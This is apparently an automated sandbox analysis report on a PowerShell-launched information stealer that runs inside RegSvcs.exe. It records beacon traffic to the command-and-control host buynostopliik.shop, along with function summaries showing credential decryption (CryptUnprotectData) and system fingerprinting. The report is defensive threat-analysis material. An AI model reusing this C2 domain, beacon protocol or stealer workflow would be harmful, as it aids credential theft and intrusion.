2025-01-14 16:59:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: buynostopliik.shop
2025-01-14 16:59:34 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 26 6a 3d 26 68 77 69 64 3d 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 Data Ascii: act=get_message&ver=4.0&lid=NNaWCM--TEST&j=&hwid=C8E343450A3B0C22B960CC18D99B375A
2025-01-14 16:59:34 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d04s3dkhm0g1qh8u34t9b492rf; expires=Sat, 10 May 2025 10:46:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RyAp4ODnwiasvDGFUeArQcR10AvCmsWwY%2FxPTaEXTaPH1umHV%2B6rmzm6hcrB2q6xoXb8F1ZvJOGLl9aVfoC2SFTatHIEYwhkGT6x9vQ7PdYZm%2B5M7g20KCCyes%2Fzb2WAPeumr0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d6339d40f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1488&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=983&delivery_rate=1812538&cwnd=231&unsent_bytes=0&cid=f6a173b4d8af702b&ts=484&x=0"
2025-01-14 16:59:34 UTC	54	IN	Data Raw: 33 30 0d 0a 4d 56 4c 78 58 4b 4b 4e 74 66 30 6a 53 32 4c 63 4a 48 4a 52 66 75 4d 36 6b 62 55 65 4c 4b 36 52 65 65 50 42 2b 64 74 77 58 4f 6c 71 44 77 3d 3d 0d 0a Data Ascii: 30MVLxXKKNtf0jS2LcJHJRfuM6kbUeLK6ReePB+dtwXOlqDw==
2025-01-14 16:59:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:59:17
Start date:	14/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:59:17
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:59:20
Start date:	14/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xe40000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD3410F8A9 Relevance: 1.6, APIs: 1, Instructions: 123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FFD3410F977

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 05e938313b5cdf940a703942bdb2b974c4a4c00090de49015ff20bbb3a1481ae
Instruction ID: f98f91e583cf9a1a520b42f8ac4c9278ef03c6b623ab75143829e6ac0e9b4669
Opcode Fuzzy Hash: 05e938313b5cdf940a703942bdb2b974c4a4c00090de49015ff20bbb3a1481ae
Instruction Fuzzy Hash: 90312831A0DB884FDB59DFA8885A7E97FF0EF56320F0441AFC049D72A3DA685805CB51

Function 00007FFD3410D9E8 Relevance: 1.6, APIs: 1, Instructions: 118
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FFD3410F977

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c88797dfb70f0846a76473758472e45bbf2cdfa344a009539cac50639c509c09
Instruction ID: b45defc8cab9bd1cd8724c9ba626084a1e191efa38505ab4462956824bb66801
Opcode Fuzzy Hash: c88797dfb70f0846a76473758472e45bbf2cdfa344a009539cac50639c509c09
Instruction Fuzzy Hash: 9431F931A0DB4C8FDB59DFA8845A7F9BBE0EF56321F04416FD049D7262CA785805CB51

Function 00007FFD341D1395 Relevance: 1.6, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD341D15AC

Memory Dump Source

Source File: 00000000.00000002.2312429408.00007FFD341D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd341d0000_powershell.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: d3afb9323fa762673718dbbdb73a14270f3b80d43e0d651658e96647c27ef579
Instruction ID: b74ee66d0d7dce231410e154b765e28d7d7670a852f2c6549e26b25d9a6c0799
Opcode Fuzzy Hash: d3afb9323fa762673718dbbdb73a14270f3b80d43e0d651658e96647c27ef579
Instruction Fuzzy Hash: AFA1F262F0EA890FE7E69A6858B46B57BE1EF57210F0802FBD18DC7193DE1DA805D341

Non-executed Functions

Function 00007FFD3410D850 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD3410D939

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: e34babe9ba1ac4e354495ae62e9c96448baf6190b2c29404dd31d3f7c42f66bc
Instruction ID: 72574ce12b4e58d35282a70e695fa1e83893c7349cbac02209864c53818932b2
Opcode Fuzzy Hash: e34babe9ba1ac4e354495ae62e9c96448baf6190b2c29404dd31d3f7c42f66bc
Instruction Fuzzy Hash: 24419557A0D7D24BE353BBB868F62E77F658F43224B0900B7C388DD093DE0965069395

Function 00007FFD34104A70 Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7e4ec4fbb4663cb891ddeba83753d6a7f946bc9c82b42db536e50c131d42fc
Instruction ID: 37de74ac9f87ad0d92651de814313be3e43023376c4d6252b7edcc478c873596
Opcode Fuzzy Hash: 3b7e4ec4fbb4663cb891ddeba83753d6a7f946bc9c82b42db536e50c131d42fc
Instruction Fuzzy Hash: B7F1F631B0DA494FEB99EB28C899B7977E1EF56310F0401BDE05EC72A2DE29AC45D740

Function 00007FFD34104035 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8514dd00cc4c14b998f25b37998449ebfbb932e0ee31360738e86f74aa6fcb71
Instruction ID: 03a7df59c42d3a827bb92c8a6a31ebe1d960665413418ebbae9aac95aab41756
Opcode Fuzzy Hash: 8514dd00cc4c14b998f25b37998449ebfbb932e0ee31360738e86f74aa6fcb71
Instruction Fuzzy Hash: 8881865BB0EBD25AE752972C68F60D63FA0EF9322474910B7C6C4CA093DA1C7817B261

Function 00007FFD34103E65 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc4002e02a9b019fe6bd3e4bfb0c0b1a0a0d862fa9f4f82075f5480e788d044
Instruction ID: aabb3d3262fa8f5a0e2edb1235e15b30a644ecb966c18e2ce65594ba32127893
Opcode Fuzzy Hash: efc4002e02a9b019fe6bd3e4bfb0c0b1a0a0d862fa9f4f82075f5480e788d044
Instruction Fuzzy Hash: 0E5143A7A0EBCA1FF753572C58B61D52FA0EF5362470A01F7C5D4CE093D9095817A212

Function 00007FFD3410A470 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b610f00a9168848e8183caef7877df530b25310dca4a3a35452ff8098054567
Instruction ID: c1f7dd6516912c692196b895f3fbb89f03deb3bc3225fb3a059b40460b65a3a3
Opcode Fuzzy Hash: 6b610f00a9168848e8183caef7877df530b25310dca4a3a35452ff8098054567
Instruction Fuzzy Hash: A8217E7270C6490FE36C9E688C69072BBD5EBD7260B15437FE1CAC25A3EC1898474392

Function 00007FFD34105180 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d97a468c6d4e567773abddb65db9c94e8ed4b8e5bc0e8f0e6c38748a7180b27
Instruction ID: ca7da6d9f3f2648032d6215a78de538de98b74ddb51a37ae538acd0c7c28c7a2
Opcode Fuzzy Hash: 1d97a468c6d4e567773abddb65db9c94e8ed4b8e5bc0e8f0e6c38748a7180b27
Instruction Fuzzy Hash: DC2178A261DB990FE32C9A744C9A172BB99EB87210B06427ECAC7C7193DD58680793C1

Function 00007FFD3410C0A4 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174ce1a0c590bdc14f2f83b6737cd764d17fa8530a60e93b38f7a6fd5395b1cf
Instruction ID: 6daaa7e0aad65cedd1c557d82b6720ccf0f0054a0b349a191aa2eceb9695f263
Opcode Fuzzy Hash: 174ce1a0c590bdc14f2f83b6737cd764d17fa8530a60e93b38f7a6fd5395b1cf
Instruction Fuzzy Hash: 75113D7260D7580F931CDD999C9A077BBD9E383321711523FE68BC35B3E965980386C5

Function 00007FFD34102EFA Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2311978355.00007FFD34100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8121bbc3a03c77134bd189f1709edbc2a6701bb2466c225bf2a185c274c76166
Instruction ID: 9dc6e710204538ff587cc28b4b9f27dd36f73ff2daed1883aabe34a4f8354755
Opcode Fuzzy Hash: 8121bbc3a03c77134bd189f1709edbc2a6701bb2466c225bf2a185c274c76166
Instruction Fuzzy Hash: 17219A97A0DED21FF26253284CF50D59BD0EF1739970850F2C689CA193ED1D1C07A155

Analysis Process: RegSvcs.exePID: 6480, Parent PID: 7120COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.4%
Total number of Nodes:	320
Total number of Limit Nodes:	25

Executed Functions

Function 0043B7B0 Relevance: 23.6, APIs: 11, Strings: 2, Instructions: 851
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(7F7E7D64,00000000,00000001,D3D2D1DD,00000000,?,D3D2D1DD,?,?,?), ref: 0043BB57
SysAllocString.OLEAUT32 ref: 0043BBE2
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,D3D2D1DD,?,?,?), ref: 0043BC20
SysAllocString.OLEAUT32 ref: 0043BC67
SysAllocString.OLEAUT32 ref: 0043BD1F
VariantInit.OLEAUT32(?), ref: 0043BD8D

Strings

qn, xrefs: 0043BCD0
./, xrefs: 0043BDC6

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: ./$qn
API String ID: 65563702-3823645636
Opcode ID: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
Instruction ID: 2f0884b81ea7a4518840af457542ae1764f48caff3a768fe7da6a1d928f758ff
Opcode Fuzzy Hash: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
Instruction Fuzzy Hash: 1F52E172A083508FD718CF28C89176BBBE2EFC9310F14992EE6D59B391D7759805CB86

Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A

Strings

<QrS, xrefs: 0042430B
d)E+, xrefs: 004242FB
Y1\3, xrefs: 004242CB
H%Z', xrefs: 004242F3
4Y>[, xrefs: 0042431B
UW, xrefs: 004240AE, 004240B2
A!K#, xrefs: 004242EB
P5Y7, xrefs: 004242D3
O-O/, xrefs: 00424303
]_, xrefs: 00424070

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
API String ID: 237503144-2105826625
Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004365D0
GetSystemMetrics.USER32 ref: 004365E0
DeleteObject.GDI32 ref: 00436623
SelectObject.GDI32 ref: 00436673
SelectObject.GDI32 ref: 004366CA
DeleteObject.GDI32 ref: 004366F8

Strings

phC, xrefs: 00436790
, xrefs: 004366A1
AnC, xrefs: 00436743

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $AnC$phC
API String ID: 3911056724-4014303587
Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408764
GetCurrentThreadId.KERNEL32 ref: 0040876E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
GetForegroundWindow.USER32 ref: 0040884A
ExitProcess.KERNEL32 ref: 00408A04

Strings

b/7, xrefs: 00408794

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: b/7
API String ID: 4063528623-2085417233
Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

Function 0040D690 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8

CoUninitialize.COMBASE ref: 0040D6A0

Strings

buynostopliik.shop, xrefs: 0040D9EF
SD, xrefs: 0040D8B8
;d, xrefs: 0040D8B1
^_/C, xrefs: 0040D756
TC03, xrefs: 0040D75D

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem$Uninitialize
String ID: ;d$SD$TC03$^_/C$buynostopliik.shop
API String ID: 1556769885-423973847
Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

Function 0042DEE5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD

Strings

$qk, xrefs: 0042ED38
'5%s, xrefs: 0042EE1F

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $qk$'5%s
API String ID: 3960555810-1674721824
Opcode ID: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
Instruction ID: 77e35e584cd91eb5155daa22bb8d7f3faef11dd04174e3cb06e18610c7d197b5
Opcode Fuzzy Hash: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
Instruction Fuzzy Hash: C6D1D4716047428FD719CF2AC491762FBE2BF96300B2DC5AEC4DA8B752D739A806CB54

Function 0042ECD0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD

Strings

$qk, xrefs: 0042ED38
'5%s, xrefs: 0042EE1F

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $qk$'5%s
API String ID: 3960555810-1674721824
Opcode ID: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
Instruction ID: 774d1c6582b6df23f03d333cf1ee8e77294ae5f4637bee10b1881aef683745b3
Opcode Fuzzy Hash: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
Instruction Fuzzy Hash: A4B1E1716047428BD719CF2AC450362FBE2BFA6300F6DC5AEC4DA8B752D739A846CB54

Function 0040CB44 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D

Function 00410446 Relevance: 2.4, APIs: 1, Instructions: 941
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
Instruction ID: fd6d0c28c0521a4b2d3ba0d2fcd6f101c3ce844309344171b6c888af52a4c48d
Opcode Fuzzy Hash: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
Instruction Fuzzy Hash: F5821975A04B408FD714DF38C985396BBE2AF85324F198A3DD4EB877D2E678A445CB02

Function 00418404 Relevance: 1.7, APIs: 1, Instructions: 200
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
Instruction ID: 5b988ee3757d9e29ab9f296af5c767d3f7ba0e13420727c7ac46e6bec5acf77a
Opcode Fuzzy Hash: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
Instruction Fuzzy Hash: 115134716446025FCB19CF29CCC1687BBE2FB89304F19806ED8999F357EA79E8438744

Function 00427A50 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

klm", xrefs: 00427B31

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: klm"
API String ID: 2994545307-2308819284
Opcode ID: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
Opcode Fuzzy Hash: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA

Function 004182C0 Relevance: 1.6, APIs: 1, Instructions: 112encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
Instruction ID: 877a3ec0fd1df911aac285de86fc99df006a5b0b03a90c59e71951ea2dd66968
Opcode Fuzzy Hash: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
Instruction Fuzzy Hash: 343128B5900B419FC7308F29CC84766BBE2BF55304F19496EE46ACB761D739E881CB44

Function 00415D15 Relevance: 1.6, APIs: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
Instruction ID: 1a59348ec05e7f56259579615360e9f91351b56b2fbfb5c12ef62eceb2dabcd0
Opcode Fuzzy Hash: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
Instruction Fuzzy Hash: 8111E3B59006419FC7248F25CC84BA6B7E2BF55704F29892ED86ACB761D73AF881CB44

Function 004402D0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

